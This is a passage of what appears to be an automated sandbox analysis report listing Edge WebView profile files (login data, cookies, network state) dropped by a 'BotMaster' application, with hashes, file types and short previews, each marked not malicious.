                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Login Data

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 21, cookie 0xc, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):43008
                                                                                                                                                                                                                Entropy (8bit):0.9009435143901008
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:C2BeymwLCn8MouB6wzFlXqiEqUvJKLuyn:C2TLG7IwRFqidn
                                                                                                                                                                                                                MD5:FB3D677576C25FF04A308A1F627410B7
                                                                                                                                                                                                                SHA1:97D530911F9CB0C37717ABB145D748982ADA0440
                                                                                                                                                                                                                SHA-256:A79300470D18AF26E3C5B4F23F81915B92D490105CE84A8122BF8100EC0C7517
                                                                                                                                                                                                                SHA-512:ED6666B064958B107E55BD76E52D2E5BF7A4791379902D208EF909A6B68803240D372CE03641249EB917C241B36A5684656A48D099A8A084AD34BA009857B098
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network Action Predictor

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                                                Entropy (8bit):0.40293591932113104
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
                                                                                                                                                                                                                MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
                                                                                                                                                                                                                SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
                                                                                                                                                                                                                SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
                                                                                                                                                                                                                SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\18be91aa-2e7a-4cf6-931d-2af8181809a9.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1069
                                                                                                                                                                                                                Entropy (8bit):5.240167976875874
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:YXsjVpZ9GhiotsgdZ9GhiV4ssZ9Ghils9Z9GhiBebG7nby:YXsl4hXtsgb4h44sU4hAs74hSebZ
                                                                                                                                                                                                                MD5:6F0A49B200FDA8950388E65A7832C6DF
                                                                                                                                                                                                                SHA1:079FD0D50A871924C49D2E746D3993222CCD5F90
                                                                                                                                                                                                                SHA-256:028C11CC7DDAD956B4E2045AD196ABAB27681C27B1FD3BDFEEEE095BC2EBF995
                                                                                                                                                                                                                SHA-512:0F9D931C8EAE473D7D6D5F89F32336241885F5D00A5AD2ACB26FA670FDBDA717744A34F541A348AEED0F33B6F7DF6170E9EB748C2E65C9EB765C81DC6340127A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13354649193354353","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false],"server":"https://scontent.whatsapp.net"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13354649194338182","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false],"server":"https://static.whatsapp.net"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13354649195885779","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false],"server":"https://www.whatsapp.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13354649218259492","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABQAAABodHRwczovL3doYXRzYXBwLmNvbQ==",false],"server":"https://web.whatsapp.com"}],"supports_quic":{"address":"192.168.2.4","used_quic":t

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\67ac01d3-42d5-48fe-9d88-3e56a153b4f6.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\798b3a22-134c-4ca5-8853-0afd7cbf85fa.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):355
                                                                                                                                                                                                                Entropy (8bit):5.461273485565033
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:YWyWNa2jPeqyrUwBKB8wXwlmUUAnIMp5/LaB9pKTcYX1a3Iqax8wXwlmUUAnIMpu:YWysmLrUwBKN+UAnIai/KgYlvF+UAnIv
                                                                                                                                                                                                                MD5:6C5636BC1CB4A42B214B4AAA21660370
                                                                                                                                                                                                                SHA1:5A3D0CB0496EE98006057B34D4C84A4C8B4900F5
                                                                                                                                                                                                                SHA-256:9A5BAB3D3CC6CD121109CD22E4DC989142C1455780CBD62B043D2FEF7BB9CFCF
                                                                                                                                                                                                                SHA-512:E6E9F8B2AF55AC0D6E4D8BEC55F9E08445B5A8C0FC3F0256D7FBEFDCBA4C85084F0B322E514F10CAECDCB5C9159D87A54D8560A274FD85B835864DC3B6F1C508
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"sts":[{"expiry":1741625192.556637,"host":"IN4MVOmjPvy672m6akZ9Q9TjfMfib7NqhGdJ6K/GKYU=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1710089192.556642},{"expiry":1741625195.885955,"host":"tSH8Q9QVvv5QCC16eXTkR2TVZP56EVu5yp6acVFb7Hg=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1710089195.885959}],"version":2}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\8bef671e-667d-4553-b871-c1dcc3703f97.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\Cookies

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                Entropy (8bit):0.9548978172497328
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:TL6dnKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfBoN5da0gpfc6zk2/V0T:T2dKLopF+SawLUO1Xj8Bq/OpfcgJtY
                                                                                                                                                                                                                MD5:726A4161BE69A901E70C242901EE5F1E
                                                                                                                                                                                                                SHA1:8C65CB0313D34C16433AD41F8963E3F0955DCE24
                                                                                                                                                                                                                SHA-256:0C79B39715AFF02F71333804D83CC738300FA1BF84836CC5AB38C515B2D76C5B
                                                                                                                                                                                                                SHA-512:D852733D5D792EDD8304ADCE23805074D471CF95D4777F7545AF409291A1FA4984CEDCAD91127B252B1EA2BCE4245214E0CFA88C7929711BDED214078C5DD305
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):59
                                                                                                                                                                                                                Entropy (8bit):4.619434150836742
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
                                                                                                                                                                                                                MD5:2800881C775077E1C4B6E06BF4676DE4
                                                                                                                                                                                                                SHA1:2873631068C8B3B9495638C865915BE822442C8B
                                                                                                                                                                                                                SHA-256:226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
                                                                                                                                                                                                                SHA-512:E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\Network Persistent State~RF629194.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):59
                                                                                                                                                                                                                Entropy (8bit):4.619434150836742
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
                                                                                                                                                                                                                MD5:2800881C775077E1C4B6E06BF4676DE4
                                                                                                                                                                                                                SHA1:2873631068C8B3B9495638C865915BE822442C8B
                                                                                                                                                                                                                SHA-256:226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
                                                                                                                                                                                                                SHA-512:E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\Reporting and NEL

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                Entropy (8bit):1.7315492792832918
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:eIEumQv8m1ccnvS67/hUmhqUh1thtnmjJG:XpXbmtG
                                                                                                                                                                                                                MD5:9FCA9632095A6BA2DB64212F2DD4944C
                                                                                                                                                                                                                SHA1:481611DB8ABD08F9DD996E5AFF3381F2A006D3E4
                                                                                                                                                                                                                SHA-256:7417F60F53632B93FBF71FA5C60B9E4C9F9E91A1AC232B639BD8F5646CA73DBB
                                                                                                                                                                                                                SHA-512:DA1AE4DD82C9C9291A22C340554C6DE31F6211561BB4654BB81741B50A45DAA6EC85F9E1C1CD7B36EFE95CB5DE91A27FFFC2CA0B7D2D15195CDA5C251927C281
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\SCT Auditing Pending Reports~RF6179db.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\TransportSecurity (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):188
                                                                                                                                                                                                                Entropy (8bit):5.385365033397434
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YWRAWNj+MIOtDCofPwXq6FrUwBvT1Y9B8HQXwlm9yJUA6XcIR6RX77XMq/dcUWIE:YWyWNa7O1zPeqyrUwBKB8wXwlmUUAnI5
                                                                                                                                                                                                                MD5:497777ECBBCD652C71E51FC319CB1CCF
                                                                                                                                                                                                                SHA1:55446D18CF85FFC38F6C3BD9421E35A0C9B874A2
                                                                                                                                                                                                                SHA-256:25A0FDF7D0548C2FE20A6F05AA0D04831D4F26BBA2D780D8744AFE0F620230FB
                                                                                                                                                                                                                SHA-512:057CF83CE34402A52EC9951E99BE7E10765EB764AA4B964177EB2F26867B5C47BDC297102D88E9B9E8A0DD6B2C8558B212F5E3ED5F41B23EF07D47A83DA271E3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"sts":[{"expiry":1741625172.092993,"host":"IN4MVOmjPvy672m6akZ9Q9TjfMfib7NqhGdJ6K/GKYU=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1710089172.092998}],"version":2}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\TransportSecurity~RF61edf2.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):188
                                                                                                                                                                                                                Entropy (8bit):5.385365033397434
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YWRAWNj+MIOtDCofPwXq6FrUwBvT1Y9B8HQXwlm9yJUA6XcIR6RX77XMq/dcUWIE:YWyWNa7O1zPeqyrUwBKB8wXwlmUUAnI5
                                                                                                                                                                                                                MD5:497777ECBBCD652C71E51FC319CB1CCF
                                                                                                                                                                                                                SHA1:55446D18CF85FFC38F6C3BD9421E35A0C9B874A2
                                                                                                                                                                                                                SHA-256:25A0FDF7D0548C2FE20A6F05AA0D04831D4F26BBA2D780D8744AFE0F620230FB
                                                                                                                                                                                                                SHA-512:057CF83CE34402A52EC9951E99BE7E10765EB764AA4B964177EB2F26867B5C47BDC297102D88E9B9E8A0DD6B2C8558B212F5E3ED5F41B23EF07D47A83DA271E3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"sts":[{"expiry":1741625172.092993,"host":"IN4MVOmjPvy672m6akZ9Q9TjfMfib7NqhGdJ6K/GKYU=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1710089172.092998}],"version":2}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\TransportSecurity~RF621be7.TMP (copy)

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):188
                                                                                                                                                                                                                Entropy (8bit):5.385365033397434
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YWRAWNj+MIOtDCofPwXq6FrUwBvT1Y9B8HQXwlm9yJUA6XcIR6RX77XMq/dcUWIE:YWyWNa7O1zPeqyrUwBKB8wXwlmUUAnI5
                                                                                                                                                                                                                MD5:497777ECBBCD652C71E51FC319CB1CCF
                                                                                                                                                                                                                SHA1:55446D18CF85FFC38F6C3BD9421E35A0C9B874A2
                                                                                                                                                                                                                SHA-256:25A0FDF7D0548C2FE20A6F05AA0D04831D4F26BBA2D780D8744AFE0F620230FB
                                                                                                                                                                                                                SHA-512:057CF83CE34402A52EC9951E99BE7E10765EB764AA4B964177EB2F26867B5C47BDC297102D88E9B9E8A0DD6B2C8558B212F5E3ED5F41B23EF07D47A83DA271E3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"sts":[{"expiry":1741625172.092993,"host":"IN4MVOmjPvy672m6akZ9Q9TjfMfib7NqhGdJ6K/GKYU=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1710089172.092998}],"version":2}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\Trust Tokens

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\b0247980-9615-4662-832d-c83c6d036ec2.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):59
                                                                                                                                                                                                                Entropy (8bit):4.619434150836742
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
                                                                                                                                                                                                                MD5:2800881C775077E1C4B6E06BF4676DE4
                                                                                                                                                                                                                SHA1:2873631068C8B3B9495638C865915BE822442C8B
                                                                                                                                                                                                                SHA-256:226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
                                                                                                                                                                                                                SHA-512:E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\db0a3f69-7ea8-4ea6-907d-d9d5d0e9c20a.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):188
                                                                                                                                                                                                                Entropy (8bit):5.385365033397434
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YWRAWNj+MIOtDCofPwXq6FrUwBvT1Y9B8HQXwlm9yJUA6XcIR6RX77XMq/dcUWIE:YWyWNa7O1zPeqyrUwBKB8wXwlmUUAnI5
                                                                                                                                                                                                                MD5:497777ECBBCD652C71E51FC319CB1CCF
                                                                                                                                                                                                                SHA1:55446D18CF85FFC38F6C3BD9421E35A0C9B874A2
                                                                                                                                                                                                                SHA-256:25A0FDF7D0548C2FE20A6F05AA0D04831D4F26BBA2D780D8744AFE0F620230FB
                                                                                                                                                                                                                SHA-512:057CF83CE34402A52EC9951E99BE7E10765EB764AA4B964177EB2F26867B5C47BDC297102D88E9B9E8A0DD6B2C8558B212F5E3ED5F41B23EF07D47A83DA271E3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"sts":[{"expiry":1741625172.092993,"host":"IN4MVOmjPvy672m6akZ9Q9TjfMfib7NqhGdJ6K/GKYU=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1710089172.092998}],"version":2}

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Network\e5ae290f-d72b-4180-8076-0036ecc324e8.tmp

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
